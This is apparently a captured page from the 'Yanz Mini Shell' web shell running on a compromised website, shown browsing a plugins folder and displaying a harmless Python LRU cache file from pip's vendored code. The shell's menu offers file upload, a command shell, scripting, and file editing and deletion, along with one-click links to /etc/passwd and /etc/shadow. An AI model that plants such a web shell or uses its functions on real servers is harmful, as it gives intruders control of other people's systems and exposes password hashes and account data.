Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
input-mask
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
from typing import Dict, Generic, TypeVar, TYPE_CHECKING import sys CacheKey = TypeVar("CacheKey") CacheValue = TypeVar("CacheValue") if sys.version_info < (3, 9): from pip._vendor.typing_extensions import OrderedDict else: from collections import OrderedDict class LRUCache(OrderedDict[CacheKey, CacheValue]): """ A dictionary-like container that stores a given maximum items. If an additional item is added when the LRUCache is full, the least recently used key is discarded to make room for the new item. """ def __init__(self, cache_size: int) -> None: self.cache_size = cache_size super().__init__() def __setitem__(self, key: CacheKey, value: CacheValue) -> None: """Store a new views, potentially discarding an old value.""" if key not in self: if len(self) >= self.cache_size: self.popitem(last=False) super().__setitem__(key, value) def __getitem__(self, key: CacheKey) -> CacheValue: """Gets the item, but also makes it most recent.""" value: CacheValue = super().__getitem__(key) super().__delitem__(key) super().__setitem__(key, value) return value
Free Space : 65557946368 Byte